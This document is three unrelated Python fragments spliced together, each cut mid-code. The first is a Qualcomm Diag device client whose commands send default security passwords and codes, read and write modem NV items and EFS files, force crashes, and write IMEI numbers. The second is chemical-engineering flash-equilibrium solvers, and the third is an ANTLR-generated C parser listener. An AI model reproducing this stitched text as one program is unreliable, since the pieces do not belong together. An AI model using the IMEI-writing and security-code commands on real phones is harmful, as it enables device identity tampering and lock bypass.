if args.vid != "":
self.vid = int(args.vid, 16)
if args.pid != "":
self.pid = int(args.pid, 16)
if args.interface != "":
self.interface = int(args.interface, 16)
logfilename = "diag.txt"
if args.debugmode:
if os.path.exists(logfilename):
os.remove(logfilename)
fh = logging.FileHandler(logfilename)
self.__logger.addHandler(fh)
self.__logger.setLevel(logging.DEBUG)
else:
self.__logger.setLevel(logging.INFO)
connected = False
diag = None
if self.vid is None or self.pid is None:
diag = qcdiag(loglevel=self.__logger.level, portconfig=default_diag_vid_pid)
if self.serial:
diag.portname = self.portname
connected = diag.connect(self.serial)
else:
diag = qcdiag(loglevel=self.__logger.level, portconfig=[[self.vid, self.pid, self.interface]])
if self.serial:
diag.portname = self.portname
connected = diag.connect(self.serial)
if connected:
cmd = args.cmd
if cmd=="sp":
diag.send_sp(args.spval)
elif cmd=="spc":
diag.send_spc(args.spcval)
elif cmd=="cmd":
if args.cmdval=="":
print("cmd needed as hex string, example: 00")
else:
print(diag.send_cmd(args.cmdval))
elif cmd=="info":
print(diag.cmd_info())
elif cmd=="download":
diag.enter_downloadmode()
elif cmd=="sahara":
diag.enter_saharamode()
elif cmd=="crash":
diag.enforce_crash()
elif cmd=="efslistdir":
print(diag.efslistdir(args.path))
elif cmd=="efsreadfile":
if args.src=="" or args.dst=="":
print("Usage: -efsreadfile -src srcfile -dst dstfile")
sys.exit()
print(diag.efsreadfile(args.src,args.dst))
elif cmd=="nvread":
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
diag.print_nvitem(nvitem)
elif cmd=="nvreadsub":
if args.nvitem is None or args.nvindex is None:
print("Usage: nvreadsub [nvitem] [nvindex]")
exit(1)
nv = args.nvreadsub.split(",")
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
if "0x" in nv[1]:
nvindex = int(args.nvindex, 16)
else:
nvindex = int(args.nvindex)
diag.print_nvitemsub(nvitem,nvindex)
elif cmd=="nvwrite":
if args.data is None:
print("NvWrite requires data to write")
sys.exit()
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
data = unhexlify(args.data)
diag.write_nvitem(nvitem, data)
elif cmd=="nvwritesub":
if args.nvitem is None or args.nvindex is None or args.data is None:
print("NvWriteSub requires item, index and data to write")
sys.exit()
if "0x" in args.nvitem:
nvitem = int(args.nvitem, 16)
else:
nvitem = int(args.nvitem)
if "0x" in args.nvindex:
nvindex = int(args.nvindex, 16)
else:
nvindex = int(args.nvindex)
data = unhexlify(args.data)
diag.write_nvitemsub(nvitem, nvindex, data)
elif cmd=="nvbackup":
diag.backup_nvitems(args.filename, "error.log")
elif cmd=="writeimei":
diag.write_imei(args.imei)
elif cmd=="efsread":
diag.efsread(args.filename)
else:
print("A command is required. Use -cmd \"data\" for sending requests.")
print()
print("Valid commands are:")
print("-------------------")
print("info cmd sp spc nvread nvreadsub" +
" nvwrite writeimei nvwritesub nvbackup efsread efsreadfile" +
" efslistdir download sahara crash")
print()
diag.disconnect()
sys.exit()
else:
print("No diag device detected. Use -pid and -vid options. See -h for help.")
diag.disconnect()
sys.exit()
def main():
info = "Qualcomm Diag Client (c) B.Kerler 2019-2021."
parser = argparse.ArgumentParser(description=info)
print("\n" + info + "\n---------------------------------------\n")
subparser = parser.add_subparsers(dest="cmd", help="Valid commands are:\ninfo cmd sp spc nvread nvreadsub" +
" nvwrite writeimei nvwritesub nvbackup efsread efsreadfile\n" +
" efslistdir download sahara crash")
parser_info = subparser.add_parser("info", help="[Option] Get diag info")
parser_info.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_info.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_info.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_info.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_info.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_info.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_cmd = subparser.add_parser("cmd", help="Send command")
parser_cmd.add_argument("cmdval", help="cmd to send (hexstring), default: 00",
default="", const="00", nargs="?")
parser_cmd.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_cmd.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_cmd.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_cmd.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_cmd.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_cmd.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_sp = subparser.add_parser("sp", help="Send Security password")
parser_sp.add_argument("spval", help="Security password to send, default: <PASSWORD>",
default="FFFFFFFFFFFFFFFE", nargs="?")
parser_sp.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_sp.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_sp.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_sp.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_sp.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_sp.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_spc = subparser.add_parser("spc", help="Send Security Code")
parser_spc.add_argument("spcval", help="Security code to send, default: 303030303030",
default="303030303030", nargs="?")
parser_spc.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_spc.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_spc.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_spc.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_spc.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_spc.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvread = subparser.add_parser("nvread", help="Read nvitem")
parser_nvread.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvread.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvread.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvread.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_nvread.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvread.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvread.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvreadsub = subparser.add_parser("nvreadsub", help="Read nvitem using subsystem")
parser_nvreadsub.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvreadsub.add_argument("nvindex", help="[Option] Index to read", default="")
parser_nvreadsub.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvreadsub.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvreadsub.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_nvreadsub.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvreadsub.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvreadsub.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvwrite = subparser.add_parser("nvwrite", help="Write nvitem")
parser_nvwrite.add_argument("nvitem", help="[Option] NVItem to write", default="")
parser_nvwrite.add_argument("data", help="[Option] Data to write", default="")
parser_nvwrite.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvwrite.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvwrite.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_nvwrite.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvwrite.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvwrite.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvwritesub = subparser.add_parser("nvwritesub", help="Write nvitem using subsystem")
parser_nvwritesub.add_argument("nvitem", help="[Option] NVItem to read", default="")
parser_nvwritesub.add_argument("nvindex", help="[Option] Index to read", default="")
parser_nvwritesub.add_argument("data", help="[Option] Data to write", default="")
parser_nvwritesub.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvwritesub.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvwritesub.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_nvwritesub.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvwritesub.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvwritesub.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_writeimei = subparser.add_parser("writeimei", help="Write imei")
parser_writeimei.add_argument("imei", metavar=("<imei1,imei2,...>"), help="[Option] IMEI to write", default="")
parser_writeimei.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_writeimei.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_writeimei.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_writeimei.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_writeimei.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_writeimei.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_nvbackup = subparser.add_parser("nvbackup", help="Make nvitem backup as json")
parser_nvbackup.add_argument("filename", help="[Option] Filename to write to", default="")
parser_nvbackup.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_nvbackup.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_nvbackup.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_nvbackup.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_nvbackup.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_nvbackup.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_efsread = subparser.add_parser("efsread", help="Read efs")
parser_efsread.add_argument("filename", help="[Option] Filename to write to", default="")
parser_efsread.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_efsread.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_efsread.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_efsread.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_efsread.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_efsread.add_argument("-debugmode", help="[Option] Enable verbose logging", action="store_true")
parser_efsreadfile = subparser.add_parser("efsreadfile", help="Read efs file")
parser_efsreadfile.add_argument("src", help="[Option] Source filename", default="")
parser_efsreadfile.add_argument("dst", help="[Option] Destination filename", default="")
parser_efsreadfile.add_argument("-vid", metavar="<vid>", help="[Option] Specify vid", default="")
parser_efsreadfile.add_argument("-pid", metavar="<pid>", help="[Option] Specify pid", default="")
parser_efsreadfile.add_argument("-interface", metavar="<pid>", help="[Option] Specify interface number, default=0)",
default="0")
parser_efsreadfile.add_argument("-portname", metavar="<portname>",
help="[Option] Specify serial port (\"/dev/ttyUSB0\",\"COM1\")")
parser_efsreadfile.add_argument("-serial",help="[Option] Use serial port (autodetect)", action="store_true")
parser_efsreadfile.add_argument("-debugmode", | |
lnphis_l
l_old, g_old = l, g
# print(err, V_over_F, Ks) # xs, ys
# Check for
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol and not limited_Z:
# err_mole_balance = 0.0
# for i in cmps:
# err_mole_balance += abs(xs_old[i] * (1.0 - V_over_F_old) + ys_old[i] * V_over_F_old - zs[i])
# if err_mole_balance < mole_balance_tol:
# return V_over_F, xs, ys, l, g, iteration, err
# Temporary!
g = gas_phase.to(ys_old, T=T, P=P, V=V)
l = liquid_phase.to(xs_old, T=T, P=P, V=V)
return V_over_F_old, xs_old, ys_old, l, g, iteration, err
# elif err < tol and limited_Z:
# print(l.fugacities()/np.array(g.fugacities()))
err1, err2, err3 = err, err1, err2
raise UnconvergedError('End of SS without convergence')
def sequential_substitution_NP(T, P, zs, compositions_guesses, betas_guesses,
phases, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, ref_phase=2):
compositions = compositions_guesses
cmps = range(len(zs))
phase_count = len(phases)
phases_iter = range(phase_count)
phase_iter_n1 = range(phase_count - 1)
betas = betas_guesses
if len(betas) < len(phases):
betas.append(1.0 - sum(betas))
compositions_K_order = [compositions[i] for i in phases_iter if i != ref_phase]
compositions_ref = compositions_guesses[ref_phase]
for iteration in range(maxiter):
phases = [phases[i].to_TP_zs(T=T, P=P, zs=compositions[i]) for i in phases_iter]
lnphis = [phases[i].lnphis() for i in phases_iter]
Ks = []
lnphis_ref = lnphis[ref_phase]
for i in phases_iter:
if i != ref_phase:
lnphis_i = lnphis[i]
try:
Ks.append([exp(lnphis_ref[j] - lnphis_i[j]) for j in cmps])
except OverflowError:
Ks.append([trunc_exp(lnphis_ref[j] - lnphis_i[j]) for j in cmps])
beta_guesses = [betas[i] for i in phases_iter if i != ref_phase]
#if phase_count == 3:
# Rachford_Rice_solution2(zs, Ks[0], Ks[1], beta_y=beta_guesses[0], beta_z=beta_guesses[1])
betas_new, compositions_new = Rachford_Rice_solutionN(zs, Ks, beta_guesses)
# Sort the order back
beta_ref_new = betas_new[-1]
betas_new = betas_new[:-1]
betas_new.insert(ref_phase, beta_ref_new)
compositions_ref_new = compositions_new[-1]
compositions_K_order_new = compositions_new[:-1]
compositions_new = list(compositions_K_order_new)
compositions_new.insert(ref_phase, compositions_ref_new)
err = 0.0
for i in phase_iter_n1:
Ks_i = Ks[i]
ys = compositions_K_order[i]
try:
for Ki, xi, yi in zip(Ks_i, compositions_ref, ys):
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
except ZeroDivisionError:
err = 0.0
for Ki, xi, yi in zip(Ks_i, compositions_ref, ys):
try:
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
except ZeroDivisionError:
pass
# print(betas, Ks, 'calculated', err)
# print(err)
compositions = compositions_new
compositions_K_order = compositions_K_order_new
compositions_ref = compositions_ref_new
betas = betas_new
# TODO trivial solution check - how to handle - drop phase?
# Check for
# comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
# if comp_difference < trivial_solution_tol:
# raise ValueError("Converged to trivial condition, compositions of both phases equal")
if err < tol:
return betas, compositions, phases, iteration, err
# if iteration > 100:
# return betas, compositions, phases, iteration, err
raise UnconvergedError('End of SS without convergence')
def sequential_substitution_Mehra_2P(T, P, zs, xs_guess, ys_guess, liquid_phase,
gas_phase, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5,
acc_frequency=3, acc_delay=5,
lambda_max=3, lambda_min=0.0,
V_over_F_guess=None):
xs, ys = xs_guess, ys_guess
if V_over_F_guess is None:
V_over_F = 0.5
else:
V_over_F = V_over_F_guess
N = len(zs)
cmps = range(N)
lambdas = [1.0]*N
Ks = [ys[i]/xs[i] for i in cmps]
gs = []
import numpy as np
for iteration in range(maxiter):
g = gas_phase.to_TP_zs(T=T, P=P, zs=ys)
l = liquid_phase.to_TP_zs(T=T, P=P, zs=xs)
fugacities_g = g.fugacities()
fugacities_l = l.fugacities()
# Ks = [fugacities_l[i]*ys[i]/(fugacities_g[i]*xs[i]) for i in cmps]
lnphis_g = g.lnphis()
lnphis_l = l.lnphis()
phis_g = g.phis()
phis_l = l.phis()
# Ks = [Ks[i]*exp(-lnphis_g[i]/lnphis_l[i]) for i in cmps]
# Ks = [Ks[i]*(phis_l[i]/phis_g[i]/Ks[i])**lambdas[i] for i in cmps]
# Ks = [Ks[i]*fugacities_l[i]/fugacities_g[i] for i in cmps]
# Ks = [Ks[i]*exp(-phis_g[i]/phis_l[i]) for i in cmps]
# Mehra, <NAME>., <NAME>, and <NAME>. “An Accelerated Successive Substitution Algorithm.” The Canadian Journal of Chemical Engineering 61, no. 4 (August 1, 1983): 590-96. https://doi.org/10.1002/cjce.5450610414.
# Strongly believed correct
gis = np.log(fugacities_g) - np.log(fugacities_l)
if not (iteration % acc_frequency) and iteration > acc_delay:
gis_old = np.array(gs[-1])
# lambdas = np.abs(gis_old.T*gis_old/(gis_old.T*(gis_old - gis))*lambdas).tolist() # Alrotithm 3 also working
# lambdas = np.abs(gis_old.T*(gis_old-gis)/((gis_old-gis).T*(gis_old - gis))*lambdas).tolist() # WORKING
lambdas = np.abs(gis.T*gis/(gis_old.T*(gis - gis_old))).tolist() # 34, working
lambdas = [min(max(li, lambda_min), lambda_max) for li in lambdas]
# print(lambdas[0:5])
print(lambdas)
# print('Ks', Ks, )
# print(Ks[-1], phis_l[-1], phis_g[-1], lambdas[-1], gis[-1], gis_old[-1])
Ks = [Ks[i]*(phis_l[i]/phis_g[i]/Ks[i])**lambdas[i] for i in cmps]
# print(Ks)
else:
Ks = [Ks[i]*fugacities_l[i]/fugacities_g[i] for i in cmps]
# print(Ks[0:5])
gs.append(gis)
# lnKs = [lnKs[i]*1.5 for i in cmps]
V_over_F, xs_new, ys_new = flash_inner_loop(zs, Ks, guess=V_over_F)
# Check for negative fractions - normalize only if needed
for xi in xs_new:
if xi < 0.0:
xs_new_sum = sum(abs(i) for i in xs_new)
xs_new = [abs(i)/xs_new_sum for i in xs_new]
break
for yi in ys_new:
if yi < 0.0:
ys_new_sum = sum(abs(i) for i in ys_new)
ys_new = [abs(i)/ys_new_sum for i in ys_new]
break
err = 0.0
# Suggested tolerance 1e-15
for Ki, xi, yi in zip(Ks, xs, ys):
# equivalent of fugacity ratio
# Could divide by the old Ks as well.
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
print(err)
# Accept the new compositions
xs, ys = xs_new, ys_new
# Check for
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol:
return V_over_F, xs, ys, l, g, iteration, err
raise UnconvergedError('End of SS without convergence')
def sequential_substitution_GDEM3_2P(T, P, zs, xs_guess, ys_guess, liquid_phase,
gas_phase, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, V_over_F_guess=None,
acc_frequency=3, acc_delay=3,
):
xs, ys = xs_guess, ys_guess
if V_over_F_guess is None:
V_over_F = 0.5
else:
V_over_F = V_over_F_guess
cmps = range(len(zs))
all_Ks = []
all_lnKs = []
for iteration in range(maxiter):
g = gas_phase.to_TP_zs(T=T, P=P, zs=ys)
l = liquid_phase.to_TP_zs(T=T, P=P, zs=xs)
lnphis_g = g.lnphis()
lnphis_l = l.lnphis()
# Mehra et al. (1983) is another option
# Ks = [exp(l - g) for l, g in zip(lnphis_l, lnphis_g)]
# if not (iteration %3) and iteration > 3:
# dKs = gdem(Ks, all_Ks[-1], all_Ks[-2], all_Ks[-3])
# print(iteration, dKs)
# Ks = [Ks[i] + dKs[i] for i in cmps]
# all_Ks.append(Ks)
# lnKs = [(l - g) for l, g in zip(lnphis_l, lnphis_g)]
# if not (iteration %3) and iteration > 3:
## dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
#
# dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
# lnKs = [lnKs[i] + dlnKs[i] for i in cmps]
# <NAME>., <NAME>, and <NAME>. “An Accelerated Successive Substitution Algorithm.” The Canadian Journal of Chemical Engineering 61, no. 4 (August 1, 1983): 590-96. https://doi.org/10.1002/cjce.5450610414.
lnKs = [(l - g) for l, g in zip(lnphis_l, lnphis_g)]
if not (iteration %acc_frequency) and iteration > acc_delay:
dlnKs = gdem(lnKs, all_lnKs[-1], all_lnKs[-2], all_lnKs[-3])
print(dlnKs)
lnKs = [lnKs[i] + dlnKs[i] for i in cmps]
# Try to testaccelerated
all_lnKs.append(lnKs)
Ks = [exp(lnKi) for lnKi in lnKs]
V_over_F, xs_new, ys_new = flash_inner_loop(zs, Ks, guess=V_over_F)
# Check for negative fractions - normalize only if needed
for xi in xs_new:
if xi < 0.0:
xs_new_sum = sum(abs(i) for i in xs_new)
xs_new = [abs(i)/xs_new_sum for i in xs_new]
break
for yi in ys_new:
if yi < 0.0:
ys_new_sum = sum(abs(i) for i in ys_new)
ys_new = [abs(i)/ys_new_sum for i in ys_new]
break
err = 0.0
# Suggested tolerance 1e-15
for Ki, xi, yi in zip(Ks, xs, ys):
# equivalent of fugacity ratio
# Could divide by the old Ks as well.
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
# Accept the new compositions
xs, ys = xs_new, ys_new
# Check for
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol:
return V_over_F, xs, ys, l, g, iteration, err
raise UnconvergedError('End of SS without convergence')
def nonlin_equilibrium_NP(T, P, zs, compositions_guesses, betas_guesses,
phases, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, ref_phase=-1,
method='hybr', solve_kwargs=None, debug=False):
if solve_kwargs is None:
solve_kwargs = {}
compositions = compositions_guesses
N = len(zs)
Nm1 = N - 1
cmps = range(N)
phase_count = len(phases)
phase_iter = range(phase_count)
if ref_phase < 0:
ref_phase = phase_count + ref_phase
phase_iter_n1 = [i for i in phase_iter if i != ref_phase]
phase_iter_n1_0 = range(phase_count-1)
betas = betas_guesses
if len(betas) < len(phases):
betas.append(1.0 - sum(betas))
flows_guess = [compositions_guesses[j][i]*betas[j] for j in phase_iter_n1 for | |
Enter a parse tree produced by CParser#declarationSpecifier.
def enterDeclarationSpecifier(self, ctx:CParser.DeclarationSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#declarationSpecifier.
def exitDeclarationSpecifier(self, ctx:CParser.DeclarationSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initDeclaratorList.
def enterInitDeclaratorList(self, ctx:CParser.InitDeclaratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initDeclaratorList.
def exitInitDeclaratorList(self, ctx:CParser.InitDeclaratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initDeclarator.
def enterInitDeclarator(self, ctx:CParser.InitDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initDeclarator.
def exitInitDeclarator(self, ctx:CParser.InitDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#storageClassSpecifier.
def enterStorageClassSpecifier(self, ctx:CParser.StorageClassSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#storageClassSpecifier.
def exitStorageClassSpecifier(self, ctx:CParser.StorageClassSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeSpecifier.
def enterTypeSpecifier(self, ctx:CParser.TypeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeSpecifier.
def exitTypeSpecifier(self, ctx:CParser.TypeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structOrUnionSpecifier.
def enterStructOrUnionSpecifier(self, ctx:CParser.StructOrUnionSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structOrUnionSpecifier.
def exitStructOrUnionSpecifier(self, ctx:CParser.StructOrUnionSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structOrUnion.
def enterStructOrUnion(self, ctx:CParser.StructOrUnionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structOrUnion.
def exitStructOrUnion(self, ctx:CParser.StructOrUnionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclarationList.
def enterStructDeclarationList(self, ctx:CParser.StructDeclarationListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclarationList.
def exitStructDeclarationList(self, ctx:CParser.StructDeclarationListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclaration.
def enterStructDeclaration(self, ctx:CParser.StructDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclaration.
def exitStructDeclaration(self, ctx:CParser.StructDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#specifierQualifierList.
def enterSpecifierQualifierList(self, ctx:CParser.SpecifierQualifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#specifierQualifierList.
def exitSpecifierQualifierList(self, ctx:CParser.SpecifierQualifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclaratorList.
def enterStructDeclaratorList(self, ctx:CParser.StructDeclaratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclaratorList.
def exitStructDeclaratorList(self, ctx:CParser.StructDeclaratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclarator.
def enterStructDeclarator(self, ctx:CParser.StructDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclarator.
def exitStructDeclarator(self, ctx:CParser.StructDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumSpecifier.
def enterEnumSpecifier(self, ctx:CParser.EnumSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumSpecifier.
def exitEnumSpecifier(self, ctx:CParser.EnumSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumeratorList.
def enterEnumeratorList(self, ctx:CParser.EnumeratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumeratorList.
def exitEnumeratorList(self, ctx:CParser.EnumeratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumerator.
def enterEnumerator(self, ctx:CParser.EnumeratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumerator.
def exitEnumerator(self, ctx:CParser.EnumeratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumerationConstant.
def enterEnumerationConstant(self, ctx:CParser.EnumerationConstantContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumerationConstant.
def exitEnumerationConstant(self, ctx:CParser.EnumerationConstantContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#atomicTypeSpecifier.
def enterAtomicTypeSpecifier(self, ctx:CParser.AtomicTypeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#atomicTypeSpecifier.
def exitAtomicTypeSpecifier(self, ctx:CParser.AtomicTypeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeQualifier.
def enterTypeQualifier(self, ctx:CParser.TypeQualifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeQualifier.
def exitTypeQualifier(self, ctx:CParser.TypeQualifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#functionSpecifier.
def enterFunctionSpecifier(self, ctx:CParser.FunctionSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#functionSpecifier.
def exitFunctionSpecifier(self, ctx:CParser.FunctionSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#alignmentSpecifier.
def enterAlignmentSpecifier(self, ctx:CParser.AlignmentSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#alignmentSpecifier.
def exitAlignmentSpecifier(self, ctx:CParser.AlignmentSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#declarator.
def enterDeclarator(self, ctx:CParser.DeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#declarator.
def exitDeclarator(self, ctx:CParser.DeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#directDeclarator.
def enterDirectDeclarator(self, ctx:CParser.DirectDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#directDeclarator.
def exitDirectDeclarator(self, ctx:CParser.DirectDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccDeclaratorExtension.
def enterGccDeclaratorExtension(self, ctx:CParser.GccDeclaratorExtensionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccDeclaratorExtension.
def exitGccDeclaratorExtension(self, ctx:CParser.GccDeclaratorExtensionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttributeSpecifier.
def enterGccAttributeSpecifier(self, ctx:CParser.GccAttributeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccAttributeSpecifier.
def exitGccAttributeSpecifier(self, ctx:CParser.GccAttributeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttributeList.
def enterGccAttributeList(self, ctx:CParser.GccAttributeListContext):
self.enter_rule(ctx)
